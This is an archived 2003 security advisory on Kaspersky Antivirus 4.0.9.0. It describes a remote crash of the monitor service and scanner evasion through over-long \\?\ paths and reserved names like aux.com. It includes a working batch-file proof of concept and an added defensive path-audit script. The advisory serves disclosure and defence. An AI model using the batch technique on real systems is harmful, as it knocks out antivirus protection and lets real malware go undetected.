11th Feb 2003 [SBWID-5981]
COMMAND
Kaspersky Antivirus DoS
SYSTEMS AFFECTED
Kaspersky Antivirus 4.0.9.0 (Server and Workstation version on Windows
NT 4.0 and Windows 2000)
PROBLEM
From the ZARAZA [[email protected]] advisory:
http://www.security.nnov.ru
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A }
+-------------o66o--+ /
|/
--snip--
A few vulnerabilities were identified. The most serious allows a user to crash
the antiviral server remotely (write access to any directory on the remote
server is required).
1. Long path crash
2. Long path prevents malware from detection
3. Special name prevents malware from detection
Details:
========
1. Long path crash
The NTFS file system allows paths of almost unlimited length to be created, but
the Windows API does not allow a path longer than 256 bytes. To prevent the
Windows API from checking the requested path, the \\?\ prefix may be added to
the filename. This is a documented feature of the Windows API. Paths longer than
256 characters will cause the KAV monitor service to crash or hang with
100% CPU usage. The possibility of code execution has not been researched.
2. Long path prevents malware from detection
A long path will also prevent malware from being detected by the antiviral
scanner.
3. Special name prevents malware from detection
It is possible to create an NTFS file with a name like aux.vbs or aux.com.
Malware in such a file will not be detected.
Exploit:
========
This .bat file demonstrates the vulnerability.
1, 2. Long path crash and long path preventing malware detection
@echo off
SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%\%A%
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >\\?\c:\%A%\%A%\%A%\%A%\%A%\%A%\%A%.com
3. Special name prevents malware from detection
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >\\?\c:\aux.com
--snap--
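An added defensive check, not part of the advisory: the audit below flags file paths showing the two conditions described above (paths beyond the Win32 length limit, and reserved DOS device names such as aux.com). It assumes the advisory's 256-character figure as the threshold and the standard DOS device-name list; the sample paths are constructed here.

```python
# The advisory gives the Win32 path limit as 256; use that as the threshold.
MAX_PATH_LIMIT = 256
EXTENDED_PREFIX = "\\\\?\\"  # the literal \\?\ prefix that skips Win32 path parsing

# DOS device names that Win32 path parsing treats specially regardless of
# extension, so "aux.com" names the AUX device rather than an ordinary file.
RESERVED_DEVICE_NAMES = {"CON", "PRN", "AUX", "NUL"} | {
    f"{dev}{n}" for dev in ("COM", "LPT") for n in range(1, 10)
}

def strip_extended_prefix(path):
    """Return the path without the extended-length prefix so both forms compare equally."""
    return path[len(EXTENDED_PREFIX):] if path.startswith(EXTENDED_PREFIX) else path

def is_reserved_device_name(filename):
    """True if the part before the first dot is a reserved DOS device name."""
    stem = filename.split(".", 1)[0].rstrip(" ")
    return stem.upper() in RESERVED_DEVICE_NAMES

def audit_path(path):
    """Return the findings for one path; an empty list means nothing flagged."""
    findings = []
    if path.startswith(EXTENDED_PREFIX):
        findings.append("extended-prefix")
    plain = strip_extended_prefix(path)
    if len(plain) > MAX_PATH_LIMIT:
        findings.append("exceeds-max-path")
    filename = plain.rstrip("\\").rsplit("\\", 1)[-1]
    if is_reserved_device_name(filename):
        findings.append("reserved-device-name")
    return findings

def audit_paths(paths):
    """Map each flagged path to its findings; clean paths are omitted."""
    return {p: f for p in paths for f in [audit_path(p)] if f}

# Constructed sample paths modelled on the advisory's batch file (no real files).
SEGMENT = "A" * 200
SAMPLE_PATHS = [
    "c:\\tools\\report.doc",                                      # ordinary file
    "c:\\data\\auxiliary.txt",                      # stem is not a device name
    EXTENDED_PREFIX + "c:\\" + "\\".join([SEGMENT] * 7) + ".com",  # long path
    EXTENDED_PREFIX + "c:\\aux.com",              # reserved device name via \\?\
    "c:\\scripts\\COM1.vbs",                   # reserved name without the prefix
]

if __name__ == "__main__":
    for path, findings in audit_paths(SAMPLE_PATHS).items():
        print(f"{', '.join(findings):40s} {path[:60]}")
```

Run on a real tree by feeding audit_paths the output of a directory walk that opens paths with the \\?\ prefix, so entries a length-limited scanner would skip are still enumerated.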
SOLUTION
None yet